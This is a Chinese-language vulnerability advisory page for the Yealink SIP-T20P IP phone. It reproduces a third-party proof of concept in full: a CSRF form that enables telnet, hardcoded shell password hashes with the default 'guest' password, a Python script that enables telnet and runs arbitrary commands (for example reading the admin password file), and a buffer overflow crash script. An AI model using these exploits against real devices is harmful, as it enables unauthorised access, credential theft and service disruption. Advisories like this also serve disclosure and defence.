Yealink SIP-T20P IP电话隐藏页面安全绕过漏洞

发布日期：2012-12-21
更新日期：2012-12-24受影响系统：
yealink Yealink SIP-T20P IP Phone <=9.70.0.100
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 57029

Yealink SIP-T20P是一款IP电话。

YeaLink IP Phone SIP-TxxP <=9.70.0.100存在多个安全绕过、缓冲区溢出、跨站请求伪造漏洞，攻击者可利用这些漏洞执行任意代码或绕过某些安全限制，执行非法操作。存在的漏洞简单描述如下：
1）默认的用户名（"user"）和密码（"user"）可以访问隐藏页面http://<IP>/cgi-bin/ConfigManApp.com？Id=10，该隐藏页面包含启用Telnet功能的选项。
2）固件包含硬编码的telnet shell用户名和密码；文件"/tmp/.htpasswd"包含有web interface的"admin"用户的密码且该文件为全局可读。
3）存在跨站请求伪造漏洞。
4）监听12345端口的/yealink/bin/macd进程存在缓冲区溢出漏洞。

细节见xistence所公布的poc。

<*来源：xistence （xistence@0x90.nl）

链接：http://www.exploit-db.com/exploits/23572/
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
xistence （xistence@0x90.nl）提供了如下测试方法：

#+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 Multiple Vulnerabilities
# Date : 12-21-2012
# Author : xistence （xistence<[AT]>0x90.nl）
# Software link : http://yealink.com/SupportDownloadfiles_detail.aspx？ProductsID=64&CateID=187&flag=142
# Vendor site : http://yealink.com
# Version : 9.70.0.100 and lower
# Tested on : YeaLink IP Phone SIP-T20P （hardware VoIP phone）
#
# Vulnerability : Multiple Vulnerabilities as described below
#
#+--------------------------------------------------------------------------------------------------------------------------------+ [0x01] - Hidden page to enable telnet + CSRF The hidden page http://<IP>/cgi-bin/ConfigManApp.com？Id=10 contains an option to enable Telnet on the phone. Only the "admin" user can access this page.
However the unprivileged user "user" can post directly to ConfigManApp.com and enable Telnet. This default user "user" has the password "user" and is unlikely to be changed by a user. Also CSRF to enable this is possible: <html>
<head>
<title>Enable Telnet</title> </head>
<body>
<form name="csrf" action="http://<IP>/cgi-bin/ConfigManApp.com" method="post">
<input type="hidden" name="PAGEID" value="10"/>
<input type="hidden" name="CONFIG_DATA" value="1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260"/>
</form>
<script> document.csrf.submit（）; </script>
</body>
</html>
[0x02] - Default telnet shell users + passwords The shell users are hardcoded in the firmware images and are always the same and can"t be changed through the webinterface. So after enabling telnet through the hidden page shell access could go unnoticed. /etc/passwd:
root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:501:501:Guest,,,:/:/bin/sh /etc/shadow:
root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7::: <- password is "guest" /etc/group:
root:x:0:admin,root
guest:x:1:guest The file "/tmp/.htpasswd" is world readable and contains the "admin" password for the web interface.
[0x03] - Exploit The following exploit logs in with the unprivileged user "user" and password "user" in the web interface. Here it enables telnet, logs in with the default user "guest" and password "guest" and executes the shell command specified.
An example is to do a "cat /tmp/.htpasswd" to retrieve the admin password for the web interface.
#！/usr/bin/python import urllib, urllib2, getpass, sys, telnetlib print ""
print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 hidden page telnet enabler + default guest shell account command execution - xistence （xistence<[at]>0x90.nl） - 2012-12-21"
print ""
if （len（sys.argv）！= 3）:
print "[*] Usage: " + sys.argv[0] + " <IP of Phone> <command to execute>"
print "[*] i.e.:" + sys.argv[0] + " 127.0.0.1 "cat /tmp/.htpasswd""
print ""
exit（0） phoneIP = sys.argv[1]
shellCmd = sys.argv[2] phoneUrl = "http://%s/cgi-bin/ConfigManApp.com" % phoneIP
webUser = "user"
webPass = "user"
telnetUser = "guest"
telnetPass = "guest" passman = urllib2.HTTPPasswordMgrWithDefaultRealm（）
passman.add_password（None, phoneUrl, webUser, webPass）
authhandler = urllib2.HTTPBasicAuthHandler（passman）
opener = urllib2.build_opener（authhandler）
urllib2.install_opener（opener）
post_params = urllib.urlencode（[（"PAGEID", "10"）, （"CONFIG_DATA", "1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260"）]） print "[*] Enable telnet on [ %s ] by posting directly to the hidden page with PAGEID=10 parameter as unprivileged user [ user ]" % phoneUrl
pagehandle = urllib2.urlopen（phoneUrl, post_params） print "[*] Making telnet connection to [ %s ] with default user [ %s ] and password [ %s ]" % （ phoneIP, telnetUser, telnetPass ）
tn = telnetlib.Telnet（phoneIP） tn.read_until（"IPPHONE login: "）
tn.write（telnetUser + " "）
if telnetPass:
tn.read_until（"Password: "）
tn.write（telnetPass + " "） tn.read_until（"$"）
print "[*] Executing shell command [ %s ]" % shellCmd
tn.write（ shellCmd + " " ）
tn.read_until（ shellCmd ）
print tn.read_until（"$"）.strip（"$ "）
tn.write（"exit "）
tn.read_all（）
[0x04] - Remote "/yealink/bin/macd" buffer overflow crash PoC The following PoC exploit will crash the "/yealink/bin/macd" process on port "12345" #！/usr/bin/python

import socket,sys,time,struct

if len（sys.argv） < 2:
print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence （xistence<[at]>0x90.nl） - 2012-12-21"
print "[-] Usage: %s <target addr> " % sys.argv[0]

sys.exit（0）

target = sys.argv[1]

if len（sys.argv） > 2:
platform = sys.argv[2]

buffer = "x41"*75

s = socket.socket（socket.AF_INET,socket.SOCK_STREAM）
try:
s.connect（（target,12345））
except:
print "[-] Connection to "+target+" failed！"
sys.exit（0） print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence （xistence<[at]>0x90.nl） - 2012-12-21"
print "[*] Sending " + `len（buffer）` + " byte crash"

s.send（buffer + " "）
s.recv（1024）建议：
--------------------------------------------------------------------------------
厂商补丁：

yealink
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://yealink.com/SupportDownloadfiles_detail.aspx？ProductsID=64&CateID=187&flag=142SIEMENS SIMATIC S7-1200 PLC拒绝服务漏洞IBM Tivoli NetView for z/OS本地权限提升漏洞相关资讯安全绕过漏洞

StarVedia IP Camera IC502w+安全（03/29/2013 14:09:17）
JBoss Enterprise Application （01/29/2013 10:15:58）
Rockwell Automation ControlLogix （01/19/2013 09:22:12）

Netgear SPH200D多个安全漏洞（02/02/2013 07:26:29）
Rockwell Automation ControlLogix （01/19/2013 09:26:45）
IBM Rational Policy Tester 5.4-8 （12/22/2012 09:27:02）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论